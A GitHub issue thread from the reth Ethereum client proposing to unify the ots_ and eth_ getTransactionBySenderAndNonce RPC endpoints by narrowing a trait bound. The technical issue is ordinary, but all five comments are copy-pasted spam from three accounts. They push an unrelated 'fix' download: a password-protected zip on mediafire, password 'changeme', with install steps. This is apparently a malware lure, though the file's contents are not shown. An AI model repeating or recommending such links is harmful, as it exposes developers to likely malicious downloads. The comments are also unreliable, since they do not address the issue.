### ISSUE TITLE
Unify gettransactionbySenderAndNonce

### ISSUE THREAD

**Issue by mattsse** [paradigmxyz/reth#10544]
### Describe the feature

ref https://github.com/paradigmxyz/reth/pull/10540#discussion_r1731202163

we currently have two endpoints that do more or less the same `ots_` and `eth_` getTransactionbySenderAndNonce

this code could be unified of Otterscan impl would depend on a subset of EthServerImpl:

https://github.com/paradigmxyz/reth/blob/dba315ff8e5e5a9937936e3c3ba5808ff6940a2b/crates/rpc/rpc/src/otterscan.rs#L72-L72 and not the rpc server impl.

## TODO
* break down `Eth: EthApiServer` bound into smaller scope, can be a combination of the helper traits  of https://github.com/paradigmxyz/reth/blob/4138b52a314cf93c9f6cf6558cb4d5b2f5dcec51/crates/rpc/rpc-eth-api/src/helpers/mod.rs#L55-L55

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
